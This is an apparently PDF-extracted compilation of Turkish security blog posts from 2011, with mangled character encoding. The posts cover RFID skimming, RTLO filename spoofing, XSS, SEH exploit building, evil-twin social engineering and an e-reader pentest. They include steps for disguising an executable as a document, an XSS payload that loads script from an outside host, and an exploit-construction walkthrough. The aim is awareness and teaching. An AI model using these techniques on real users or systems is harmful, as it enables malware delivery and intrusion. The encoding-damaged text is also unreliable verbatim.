Peki ya sonuccedil Sonuccedil itibariyle cuumlzdanınızda veya cebinizde bulunan kredi kartı numaranız ve kredi kartınızın son kullanma tarihi birşekilde (bu 2008 yılındaki videoda olduğu gibi koca bir RFID okuyucuyu cebinize yakınlaştırarak olabilir RFID kapı anteni kullanılarakolabilir veya StrongLink gibi ufak bir okuyucu kullanarak olabilir) meraklı kişi veya kişiler tarafından okunabilir Bu ihtimal duumlşuumlkdahi olsa sizin iccedilin oumlnemli bir husus ise ccediloumlzuumlm oumlnerisi olarak 20$ gibi cuumlzi bir uumlcret oumldeyerek internetten sipariş edebileceğiniz RFIDkorumalı bir cuumlzdan kullanmanızı oumlnerebilirim

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Her Goumlrduumlğuumlne İnanmaSource httpswwwmertsaricacomher-gordugune-inanmaBy MS on November 1st 2011

RTLO namı diğer RIGHT-TO-LEFT OVERRIDE Windows XP işletim sistemi kullanırken pek ccediloğumuzun dikkate almadığı ancakWindows Vista ve Windows 7 işletim sistemi kullanırken ccedilok dikkatli olmamızı gerektiren bir Evrensel kod (unicode) karakteridir(u202E) RTLO kısaca karakterlerin soldan sağa değil sağdan sola olarak işlem goumlrmesini sağlar ve bu sayede sağdan sola yazılan diller(Arapccedila İbranice Suumlryanice vs) desteklenebilmektedir

Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

